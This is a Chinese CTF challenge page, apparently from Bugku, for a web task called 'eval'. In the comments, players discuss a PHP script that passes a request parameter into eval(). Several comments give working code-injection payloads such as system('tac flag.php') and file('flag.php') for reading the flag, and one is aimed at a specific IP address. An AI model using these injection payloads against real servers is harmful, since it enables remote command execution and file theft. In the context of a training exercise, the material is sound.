evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 19437
提  示:
描  述:
eval
...
登录回复
评论
xiao 5年前
举报

直接用?hello=file('flag.php'),var_dump()函数可以打印

回复 17
wyx48046 5年前
举报

厉害!

回复 0
Hiiro 5年前
举报

大佬大佬

回复 0
test_ctf 5年前
举报

牛逼!

回复 0
Hacker23 5年前
举报

http://114.67.246.176:10183/?hello=system('tac flag.php')

回复 12
ZTyyds 4年前
举报

原理是什么啊???想了解一下

回复 0
guoguo 5年前
举报

题目内容:<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 可以使用hello=system('tac flag.php')或者?hello=10/print_r(file("flag.ph

回复 3
dsadscxzewq 5年前
举报

为啥用cat不行呢?

回复 0
痕夕 5年前
举报

看不懂,求解,大佬

回复 6
SwBack 5年前
举报

大道至简,直接当作一句话利用即可 hello=system('tac flag.php')

回复 5
巨人肩膀上的矮子 5年前
举报

@dsadscxzewq cat是可以的,只不过在源代码里查看

回复 0
dsadscxzewq 5年前
举报

为啥用cat不行呢?

回复 1
BBBugku 5年前
举报

F12查看源代码,且根据题目描述可以得知flag在flag.php文件中,且在源代码中发现hello并未赋值,因此只需在原有的url后添加 /?hello=10/print_r(file("flag.php")) ,刷新网页,找到flag。

回复 14
krystalll 5年前
举报

感谢

回复 3
lurnco 5年前
举报

Too young Too simple

回复 3
Discuze奇 5年前
举报

我的金币不太允许了呀。。。

回复 1
lurnco 5年前
举报

可以创个小号做后面的题人?

回复 0
1amer 5年前
举报

直接读文件吧

回复 0
你听说过呆呆吗? 5年前
举报

只有我一个人知道bugku更新了吗

回复 0
storn 5年前
举报

我也是刚发现,而且,我原来的号好像没了,o(╥﹏╥)o

回复 0

WriteUp

image
harry

1 金币

立即查看

评分(10)

解题动态

九久 攻破了该题 16分钟前
jwz 攻破了该题 2小时前
胡look 攻破了该题 3小时前
MAO 攻破了该题 15小时前
eee5588 攻破了该题 18小时前
zzasas 攻破了该题 20小时前
安藏七月 攻破了该题 21小时前
大宋iu后的 攻破了该题 21小时前
Rx 攻破了该题 1天前
浪鸭 攻破了该题 1天前
千万 攻破了该题 1天前
13246563665 攻破了该题 1天前
18369735915 攻破了该题 1天前
popidojdow 攻破了该题 1天前
GDGZ_CTF 攻破了该题 1天前
纳百川. 攻破了该题 1天前
link7788 攻破了该题 2天前
langzifun 攻破了该题 2天前
小贾小贾 攻破了该题 2天前
yezhongyu 攻破了该题 2天前
问题反馈